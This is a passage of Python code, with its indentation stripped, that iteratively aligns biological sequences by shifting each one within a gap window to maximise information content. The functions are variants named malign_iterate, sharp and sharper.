line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
w_nextp = w_nextp_best
wnextp_info_2 = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
endtime_time = time.clock()
print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time-start_time), " seconds elapsed")
if wnextp_info_2<wnextp_info_1*improvement_thresh and wnextp_info_2>wnextp_info_1:
break
print("Sequence improvement threshold reached. Malign is stopping.")
return(w_nextp_best)
def malign_iterate_sharp(matrix_input, improvement_thresh, seq_slide, left_gap, seq_length):
print("Malign Iterative: Sharp")
start_time = time.clock()
gaps = np.zeros([matrix_input.shape[0], 2]) #stores register and total gaps
for line in range(matrix_input.shape[0]):
register = 0
line_gaps = 0
while True:
if matrix_input[line, register]=='':
register += 1
else:
break
for y in range(matrix_input.shape[1]):
if matrix_input[line, y]=='':
line_gaps += 1
gaps[line, 0] = register
gaps[line, 1] = line_gaps
#print(line, register, line_gaps)
condense = np.zeros([matrix_input.shape[0], matrix_input.shape[1]-2*seq_slide], dtype='str')
print(condense.shape)
for x in range(condense.shape[0]):
for y in range(condense.shape[1]):
#print(x)
#print(y)
newY = y+int(gaps[x,0])
#print(newY)
condense[x, y] = matrix_input[x, y+int(gaps[x,0])]
#seq_slide = gaps[0,1]
print(matrix_input.shape[0], " sequences")
w_nextp = np.zeros(matrix_input.shape, dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = matrix_input[x, y]
wnextp_info_1 = seq_info_sharp(seq_freq_orig(w_nextp[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] = ""
for y in range(condense.shape[1]):
w_nextp[line, s + y] = condense[line, y]
line_info = seq_info_sharp(seq_freq(w_nextp[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
if line_info>line_info_max:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
if line_info==line_info_max and random.randint(0,1)==1:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
w_nextp = w_nextp_best
wnextp_info_2 = seq_info_sharp(seq_freq_orig(w_nextp_best[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
pass_counter += 1
endtime_time = time.clock()
print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time-start_time), " seconds elapsed")
if wnextp_info_2<wnextp_info_1*improvement_thresh and wnextp_info_2>wnextp_info_1:
break
if wnextp_info_2 == wnextp_info_1:
break
print("Sequence improvement threshold reached. Malign Iterative: Sharp is stopping.")
return(w_nextp_best)
def malign_iterate_sharper(matrix_input, improvement_thresh, seq_slide, left_gap, seq_length):
print("Malign Iterative: SharpER")
print("matrix input shape = ", matrix_input.shape)
print("seq_length = ", seq_length)
with open("matrix_input.txt","w") as f:
for x in range(matrix_input.shape[0]):
for y in range(matrix_input.shape[1]):
if matrix_input[x,y] =='':
f.write("-")
else:
f.write(matrix_input[x,y])
f.write("\n")
start_time = time.clock()
gaps = np.zeros([matrix_input.shape[0], 2]) #stores register and total gaps
for line in range(matrix_input.shape[0]):
register = 0
line_gaps = 0
while True:
if matrix_input[line, register]=='':
register += 1
else:
break
for y in range(matrix_input.shape[1]):
if matrix_input[line, y]=='':
line_gaps += 1
gaps[line, 0] = register
gaps[line, 1] = line_gaps
condense = np.zeros([matrix_input.shape[0], matrix_input.shape[1]-2*seq_slide], dtype='str')
print("condense shape = ", condense.shape)
for x in range(condense.shape[0]):
### x = row number in condense
#print("gap info for current line: ", gaps[x,0], gaps[x,1])
for y in range(condense.shape[1]):
#### y = col position in condense, this should be <= to
#### the sequence length without any gaps, i.e. the seq_length variable
newY = y+int(gaps[x,0])
#print(x,y,newY)
condense[x, y] = matrix_input[x, y+int(gaps[x,0])]
#seq_slide = gaps[0,1]
print(matrix_input.shape[0], " sequences")
w_nextp = np.zeros(matrix_input.shape, dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = matrix_input[x, y]
wnextp_info_1 = seq_info_sharper(seq_freq_orig(w_nextp[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] = ""
for y in range(condense.shape[1]):
w_nextp[line, s + y] = condense[line, y]
line_info = seq_info_sharper(seq_freq(w_nextp[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
if line_info>line_info_max:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
if line_info==line_info_max and random.randint(0,1)==1:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
w_nextp = w_nextp_best
wnextp_info_2 = seq_info_sharper(seq_freq_orig(w_nextp_best[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
pass_counter += 1
endtime_time = time.clock()
print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time-start_time), " seconds elapsed")
if wnextp_info_2<wnextp_info_1*improvement_thresh and wnextp_info_2>wnextp_info_1:
break
if wnextp_info_2 == wnextp_info_1:
break
print("Sequence improvement threshold reached. Malign Iterative: SharpER is stopping.")
return(w_nextp_best)
def malign_iterate(matrix_input, improvement_thresh, seq_slide, left_gap, seq_length):
print("Malign Iterative")
start_time = time.clock()
gaps = np.zeros([matrix_input.shape[0], 2]) #stores register and total gaps
for line in range(matrix_input.shape[0]):
register = 0
line_gaps = 0
while True:
if matrix_input[line, register]=='':
register += 1
else:
break
for y in range(matrix_input.shape[1]):
if matrix_input[line, y]=='':
line_gaps += 1
gaps[line, 0] = register
gaps[line, 1] = line_gaps
condense = np.zeros([matrix_input.shape[0], matrix_input.shape[1]-2*seq_slide], dtype='str')
for x in range(condense.shape[0]):
for y in range(condense.shape[1]):
condense[x, y] = matrix_input[x, y+int(gaps[x,0])]
#seq_slide = gaps[0,1]
print(matrix_input.shape[0], " sequences")
w_nextp = np.zeros(matrix_input.shape, dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = matrix_input[x, y]
wnextp_info_1 = seq_info(seq_freq_orig(w_nextp[:, int(seq_slide+left_gap):int(seq_slide+left_gap+seq_length)])) ###
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.